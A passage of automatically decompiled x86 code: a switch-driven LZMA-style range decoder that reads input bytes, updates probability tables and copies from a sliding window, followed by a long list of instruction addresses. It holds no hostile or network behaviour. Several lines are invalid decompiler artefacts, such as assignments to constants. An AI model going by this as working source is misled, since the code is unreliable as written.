											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                                                    0x00000000
                                                                                    0x00407395
                                                                                    0x00407395
                                                                                    0x00407399
                                                                                    0x004073be
                                                                                    0x004073c8
                                                                                    0x00000000
                                                                                    0x0040739b
                                                                                    0x0040739b
                                                                                    0x0040739e
                                                                                    0x004073a2
                                                                                    0x004073a5
                                                                                    0x004073a8
                                                                                    0x004073ac
                                                                                    0x004073ac
                                                                                    0x004073af
                                                                                    0x00407489
                                                                                    0x00407489
                                                                                    0x00407490
                                                                                    0x00407490
                                                                                    0x00407493
                                                                                    0x0040749a
                                                                                    0x004074c7
                                                                                    0x004074cb
                                                                                    0x0040752b
                                                                                    0x0040752e
                                                                                    0x00407533
                                                                                    0x00407534
                                                                                    0x00407536
                                                                                    0x00407538
                                                                                    0x0040753b
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406bec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x00000000
                                                                                    0x00406bfd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c06
                                                                                    0x00406c09
                                                                                    0x00406c0c
                                                                                    0x00406c10
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c16
                                                                                    0x00406c19
                                                                                    0x00406c1b
                                                                                    0x00406c1c
                                                                                    0x00406c1f
                                                                                    0x00406c21
                                                                                    0x00406c22
                                                                                    0x00406c24
                                                                                    0x00406c27
                                                                                    0x00406c2c
                                                                                    0x00406c31
                                                                                    0x00406c3a
                                                                                    0x00406c4d
                                                                                    0x00406c50
                                                                                    0x00406c5c
                                                                                    0x00406c84
                                                                                    0x00406c86
                                                                                    0x00406c94
                                                                                    0x00406c94
                                                                                    0x00406c98
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c88
                                                                                    0x00406c8b
                                                                                    0x00406c8c
                                                                                    0x00406c8c
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c62
                                                                                    0x00406c67
                                                                                    0x00406c67
                                                                                    0x00406c70
                                                                                    0x00406c78
                                                                                    0x00406c7b
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c9e
                                                                                    0x00406c9e
                                                                                    0x00406ca2
                                                                                    0x0040754e
                                                                                    0x00000000
                                                                                    0x0040754e
                                                                                    0x00406cab
                                                                                    0x00406cbb
                                                                                    0x00406cbe
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc4
                                                                                    0x00406cc8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406cca
                                                                                    0x00406cd0
                                                                                    0x00406cfa
                                                                                    0x00406d00
                                                                                    0x00406d07
                                                                                    0x00000000
                                                                                    0x00406d07
                                                                                    0x00406cd6
                                                                                    0x00406cd9
                                                                                    0x00406cde
                                                                                    0x00406cde
                                                                                    0x00406ce9
                                                                                    0x00406cf1
                                                                                    0x00406cf4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d39
                                                                                    0x00406d3f
                                                                                    0x00406d42
                                                                                    0x00406d4f
                                                                                    0x00406d57
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d0e
                                                                                    0x00406d0e
                                                                                    0x00406d12
                                                                                    0x0040755d
                                                                                    0x00000000
                                                                                    0x0040755d
                                                                                    0x00406d1e
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d2c
                                                                                    0x00406d2f
                                                                                    0x00406d32
                                                                                    0x00406d37
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073d4
                                                                                    0x004073da
                                                                                    0x004073e0
                                                                                    0x004073fa
                                                                                    0x004073fd
                                                                                    0x00407403
                                                                                    0x0040740e
                                                                                    0x0040740e
                                                                                    0x00407410
                                                                                    0x004073e2
                                                                                    0x004073e2
                                                                                    0x004073f1
                                                                                    0x004073f5
                                                                                    0x004073f5
                                                                                    0x0040741a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040741c
                                                                                    0x00407420
                                                                                    0x004075cf
                                                                                    0x00000000
                                                                                    0x004075cf
                                                                                    0x0040742c
                                                                                    0x00407433
                                                                                    0x0040743b
                                                                                    0x0040743e
                                                                                    0x00407441
                                                                                    0x00407441
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d5f
                                                                                    0x00406d61
                                                                                    0x00406d64
                                                                                    0x00406dd5
                                                                                    0x00406dd8
                                                                                    0x00406ddb
                                                                                    0x00406de2
                                                                                    0x00406dec
                                                                                    0x00000000
                                                                                    0x00406dec
                                                                                    0x00406d66
                                                                                    0x00406d6a
                                                                                    0x00406d6d
                                                                                    0x00406d6f
                                                                                    0x00406d72
                                                                                    0x00406d75
                                                                                    0x00406d77
                                                                                    0x00406d7a
                                                                                    0x00406d7c
                                                                                    0x00406d81
                                                                                    0x00406d84
                                                                                    0x00406d87
                                                                                    0x00406d8b
                                                                                    0x00406d92
                                                                                    0x00406d95
                                                                                    0x00406d9c
                                                                                    0x00406da0
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406dac
                                                                                    0x00406daf
                                                                                    0x00406dcd
                                                                                    0x00406dcf
                                                                                    0x00000000
                                                                                    0x00406db1
                                                                                    0x00406db1
                                                                                    0x00406db4
                                                                                    0x00406db7
                                                                                    0x00406dba
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbf
                                                                                    0x00406dc2
                                                                                    0x00406dc4
                                                                                    0x00406dc5
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406ffe
                                                                                    0x00407002
                                                                                    0x00407020
                                                                                    0x00407023
                                                                                    0x0040702a
                                                                                    0x0040702d
                                                                                    0x00407030
                                                                                    0x00407033
                                                                                    0x00407036
                                                                                    0x00407039
                                                                                    0x0040703b
                                                                                    0x00407042
                                                                                    0x00407043
                                                                                    0x00407045
                                                                                    0x00407048
                                                                                    0x0040704b
                                                                                    0x0040704e
                                                                                    0x0040704e
                                                                                    0x00407053
                                                                                    0x00000000
                                                                                    0x00407053
                                                                                    0x00407004
                                                                                    0x00407007
                                                                                    0x0040700a
                                                                                    0x00407014
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407068
                                                                                    0x0040706c
                                                                                    0x0040708f
                                                                                    0x00407092
                                                                                    0x00407095
                                                                                    0x0040709f
                                                                                    0x0040706e
                                                                                    0x0040706e
                                                                                    0x00407071
                                                                                    0x00407074
                                                                                    0x00407077
                                                                                    0x00407084
                                                                                    0x00407087
                                                                                    0x00407087
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070ab
                                                                                    0x004070af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070b5
                                                                                    0x004070b9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070bf
                                                                                    0x004070c1
                                                                                    0x004070c5
                                                                                    0x004070c5
                                                                                    0x004070c8
                                                                                    0x004070cc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040711c
                                                                                    0x00407120
                                                                                    0x00407127
                                                                                    0x0040712a
                                                                                    0x0040712d
                                                                                    0x00407137
                                                                                    0x00000000
                                                                                    0x00407137
                                                                                    0x00407122
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407143
                                                                                    0x00407147
                                                                                    0x0040714e
                                                                                    0x00407151
                                                                                    0x00407154
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407157
                                                                                    0x0040715a
                                                                                    0x0040715d
                                                                                    0x0040715d
                                                                                    0x00407160
                                                                                    0x00407163
                                                                                    0x00407166
                                                                                    0x00407166
                                                                                    0x00407169
                                                                                    0x00407170
                                                                                    0x00407175
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407203
                                                                                    0x00407203
                                                                                    0x00407207
                                                                                    0x004075a5
                                                                                    0x00000000
                                                                                    0x004075a5
                                                                                    0x0040720d
                                                                                    0x00407210
                                                                                    0x00407213
                                                                                    0x00407217
                                                                                    0x0040721a
                                                                                    0x00407220
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407225
                                                                                    0x00407228
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406df8
                                                                                    0x00406df8
                                                                                    0x00406dfc
                                                                                    0x00407569
                                                                                    0x00000000
                                                                                    0x00407569
                                                                                    0x00406e02
                                                                                    0x00406e05
                                                                                    0x00406e08
                                                                                    0x00406e0c
                                                                                    0x00406e0f
                                                                                    0x00406e15
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e1a
                                                                                    0x00406e1d
                                                                                    0x00406e1d
                                                                                    0x00406e20
                                                                                    0x00406e23
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e29
                                                                                    0x00406e2f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e35
                                                                                    0x00406e35
                                                                                    0x00406e39
                                                                                    0x00406e3c
                                                                                    0x00406e3f
                                                                                    0x00406e42
                                                                                    0x00406e45
                                                                                    0x00406e46
                                                                                    0x00406e49
                                                                                    0x00406e4b
                                                                                    0x00406e51
                                                                                    0x00406e54
                                                                                    0x00406e57
                                                                                    0x00406e5a
                                                                                    0x00406e5d
                                                                                    0x00406e60
                                                                                    0x00406e63
                                                                                    0x00406e7f
                                                                                    0x00406e82
                                                                                    0x00406e85
                                                                                    0x00406e88
                                                                                    0x00406e8f
                                                                                    0x00406e93
                                                                                    0x00406e95
                                                                                    0x00406e99
                                                                                    0x00406e65
                                                                                    0x00406e65
                                                                                    0x00406e69
                                                                                    0x00406e71
                                                                                    0x00406e76
                                                                                    0x00406e78
                                                                                    0x00406e7a
                                                                                    0x00406e7a
                                                                                    0x00406e9c
                                                                                    0x00406ea3
                                                                                    0x00406ea6
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eb1
                                                                                    0x00406eb1
                                                                                    0x00406eb5
                                                                                    0x00407575
                                                                                    0x00000000
                                                                                    0x00407575
                                                                                    0x00406ebb
                                                                                    0x00406ebe
                                                                                    0x00406ec1
                                                                                    0x00406ec5
                                                                                    0x00406ec8
                                                                                    0x00406ece
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed3
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406edc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ede
                                                                                    0x00406ee1
                                                                                    0x00406ee4
                                                                                    0x00406ee7
                                                                                    0x00406eea
                                                                                    0x00406eed
                                                                                    0x00406ef0
                                                                                    0x00406ef3
                                                                                    0x00406ef6
                                                                                    0x00406ef9
                                                                                    0x00406efc
                                                                                    0x00406f14
                                                                                    0x00406f17
                                                                                    0x00406f1a
                                                                                    0x00406f1d
                                                                                    0x00406f1d
                                                                                    0x00406f20
                                                                                    0x00406f24
                                                                                    0x00406f26
                                                                                    0x00406efe
                                                                                    0x00406efe
                                                                                    0x00406f06
                                                                                    0x00406f0b
                                                                                    0x00406f0d
                                                                                    0x00406f0f
                                                                                    0x00406f0f
                                                                                    0x00406f29
                                                                                    0x00406f30
                                                                                    0x00406f33
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00406f33
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f75
                                                                                    0x00406f75
                                                                                    0x00406f79
                                                                                    0x00407581
                                                                                    0x00000000
                                                                                    0x00407581
                                                                                    0x00406f7f
                                                                                    0x00406f82
                                                                                    0x00406f85
                                                                                    0x00406f89
                                                                                    0x00406f8c
                                                                                    0x00406f92
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f97
                                                                                    0x00406f9a
                                                                                    0x00406f9a
                                                                                    0x00406fa0
                                                                                    0x00406f3e
                                                                                    0x00406f3e
                                                                                    0x00406f41
                                                                                    0x00000000
                                                                                    0x00406f41
                                                                                    0x00406fa2
                                                                                    0x00406fa2
                                                                                    0x00406fa5
                                                                                    0x00406fa8
                                                                                    0x00406fab
                                                                                    0x00406fae
                                                                                    0x00406fb1
                                                                                    0x00406fb4
                                                                                    0x00406fb7
                                                                                    0x00406fba
                                                                                    0x00406fbd
                                                                                    0x00406fc0
                                                                                    0x00406fd8
                                                                                    0x00406fdb
                                                                                    0x00406fde
                                                                                    0x00406fe1
                                                                                    0x00406fe1
                                                                                    0x00406fe4
                                                                                    0x00406fe8
                                                                                    0x00406fea
                                                                                    0x00406fc2
                                                                                    0x00406fc2
                                                                                    0x00406fca
                                                                                    0x00406fcf
                                                                                    0x00406fd1
                                                                                    0x00406fd3
                                                                                    0x00406fd3
                                                                                    0x00406fed
                                                                                    0x00406ff4
                                                                                    0x00406ff7
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00407286
                                                                                    0x00407286
                                                                                    0x0040728a
                                                                                    0x004075b1
                                                                                    0x00000000
                                                                                    0x004075b1
                                                                                    0x00407290
                                                                                    0x00407293
                                                                                    0x00407296
                                                                                    0x0040729a
                                                                                    0x0040729d
                                                                                    0x004072a3
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407056
                                                                                    0x00407056
                                                                                    0x00407059
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407452
                                                                                    0x00407456
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x0040747b
                                                                                    0x00407482
                                                                                    0x00000000
                                                                                    0x00407482
                                                                                    0x00407458
                                                                                    0x0040745b
                                                                                    0x0040745e
                                                                                    0x00407461
                                                                                    0x00407468
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407543
                                                                                    0x00407546
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040717d
                                                                                    0x0040717f
                                                                                    0x00407186
                                                                                    0x00407187
                                                                                    0x00407189
                                                                                    0x0040718c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407194
                                                                                    0x00407197
                                                                                    0x0040719a
                                                                                    0x0040719c
                                                                                    0x0040719e
                                                                                    0x0040719e
                                                                                    0x0040719f
                                                                                    0x004071a2
                                                                                    0x004071a9
                                                                                    0x004071ac
                                                                                    0x004071ba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040749f
                                                                                    0x0040749f
                                                                                    0x004074a3
                                                                                    0x004075db
                                                                                    0x00000000
                                                                                    0x004075db
                                                                                    0x004074a9
                                                                                    0x004074ac
                                                                                    0x004074af
                                                                                    0x004074b3
                                                                                    0x004074b6
                                                                                    0x004074bc
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074c1
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004071c2
                                                                                    0x004071c5
                                                                                    0x004071fb
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732e
                                                                                    0x0040732e
                                                                                    0x00407331
                                                                                    0x00407333
                                                                                    0x004075bd
                                                                                    0x00000000
                                                                                    0x004075bd
                                                                                    0x00407339
                                                                                    0x0040733c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407342
                                                                                    0x00407346
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00000000
                                                                                    0x00407349
                                                                                    0x004071c7
                                                                                    0x004071c9
                                                                                    0x004071cb
                                                                                    0x004071cd
                                                                                    0x004071d0
                                                                                    0x004071d1
                                                                                    0x004071d3
                                                                                    0x004071d5
                                                                                    0x004071d8
                                                                                    0x004071db
                                                                                    0x004071f1
                                                                                    0x004071f6
